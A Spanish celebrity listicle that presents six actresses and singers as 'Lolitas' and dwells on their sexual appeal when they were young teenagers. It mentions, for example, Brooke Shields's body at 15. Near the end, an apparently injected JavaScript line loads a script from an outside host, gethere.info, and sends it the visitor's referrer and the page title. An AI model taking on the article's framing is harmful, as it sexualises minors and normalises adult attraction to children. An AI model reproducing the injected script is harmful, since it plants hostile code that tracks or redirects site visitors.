6 lolitas con las que todos hemos fantaseado

Grandes actrices del pasado se han metido en la piel de una “Lolita”. Apenas habían entrado en la adolescencia, pero ya levantaban pasiones dentro y fuera de la gran pantalla. Sensuales e inocentes, lograron seducir a más de un hombre maduro.

Una joven vestidita de colegiala sigue siendo la fantasía para muchos. Los directores apuestan por aquellas frutas prohibidas, pícaras y juguetonas que hacen del pecado una gran tentación.

Te dejamos con algunas de las “Lolitas” que más nos gustan.

Alizée @mellealizee

La francesita es una de las estrellas del pop más recordadas gracias a su sensualidad mezclada con un toque de inocencia. Está cañón no recordar esos movimientos de cadera y su característico baile del “pescadito” de esta deliciosa divertida, chica presentaba en cada show.

Natalie Portman

Si hablamos de “lolitas” Natalie Portman, a nuestro parecer, se lleva las palmas. La excelente actuación de Portman en “Beautiful Girls” nos demuestra que para el talento y belleza no hay edad. Con más de 30 películas en su carrera, esta chica estadounidense de origen israelí nos deja muy en claro que aún le faltan muchos suspiros que robar.

Chloë Grace Moretz @ChloeGMoretz

Por ser bella e intrépida “Hit Girl” es una de las superheroínas más fascinantes en la saga “Kick- Ass”.

Desde sus inicios en “Heart of the Beholder” hasta “Neighbors 2: Sorority Rising” Chloe Moretz mejor conocida como “The It Girl”, la chica que tiene “eso”, ha logrado deslumbrar y atraer a cualquiera que la vea.

Domique Swain

Justo cuando todas las niñitas querían ser como las Spice Girls, Dominique Swain se sentaba en las piernas de Jeremy Irons, en la película “Lolita”.Swan saltó a la fama en 1997 con la película de Adrian Lyne, y obviamente por poseer  esa hermosa cara de “no rompo un plato” que más de uno quiso tener en sus manos.

Britney Spears @britneyspears

Es totalmente imposible no pensar en esa colegiala buenísima luciendo una minifalda y una camisa amarrada en “…Baby one more time” cuando hablamos de Britney. Y no solo con esa canción, esta chica nos regaló más de un personaje, como olvidar el ajustado traje rojo de utilizo en “Oops!.. I Did it Again” o a esa azafata sexy en “Toxic”.

Brooke Shields

Con tan solo 15 años de edad, esta chica nos sorprendió con las escenas tan sensuales que protagonizo en “The Blue Lagoon”. La poca ropa que utilizaba y el largo cabello que apenas le cubría esas bubis perfectas, logró que nos pusiéramos a sus pies.

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetas:
Comentarios